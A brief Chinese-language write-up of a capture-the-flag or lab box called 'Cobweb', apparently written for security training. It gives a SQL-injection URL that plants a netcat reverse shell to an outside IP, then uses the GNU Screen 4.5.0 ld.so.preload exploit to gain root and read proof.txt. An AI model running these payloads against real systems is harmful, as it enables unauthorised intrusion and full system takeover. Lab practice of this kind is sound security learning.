Cobweb-中級

原始碼洩露
可以直接看到原始碼存在sql注入

反彈shellpayload
http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);echo%2011122;'%20order%20by%201%20desc%20%20--%20

檢視具有suid的命令
發現screen 命令存在漏洞GNU Screen 4.5.0 - Local Privilege Escalation

點選檢視程式碼

sh-4.4# find / -perm -u=s -type f 2>/dev/null
/var/tmp/rootshell
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount3
/usr/bin/screen-4.5.0
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/userhelper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/cockpit-session
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/selinux_child

按照https://www.exploit-db.com/exploits/41154 裡面的方法自己在本地寫好 libhax.so 和 rootshell 其中編譯rootshell的時候要加上 -static 不然執行不了 同時執行的目錄也要修改為/var/tmp 因為在/var/tmp 裡面執行不了suid命令

成功提權

bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so  rootshell
bash-4.4$ cd /etc
bash-4.4$ unmask 000
bash: unmask: command not found
bash-4.4$ umask 000 # because
bash-4.4$ screen -D -m -L ld.so.preload echo -ne  "\x0a/var/tmp/libhax.so"
bash-4.4$ screen -ls 
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-apache.

bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so  rootshell
bash-4.4$ ls -al
total 788
drwxrwxrwt   2 root   root       40 Nov  7 07:16 .
drwxr-xr-x. 22 root   root     4096 Aug 27  2021 ..
-rwxrwxrwx   1 apache apache  15696 Nov  7 06:57 libhax.so
-rwsr-xr-x   1 root   root   785800 Nov  7 07:13 rootshell
bash-4.4$ ./rootshell 
sh-4.4# whoami
root
sh-4.4# cd /root
sh-4.4# ls
proof.txt
sh-4.4# cat proof.txt 
392388689a0ceba499668648185647f6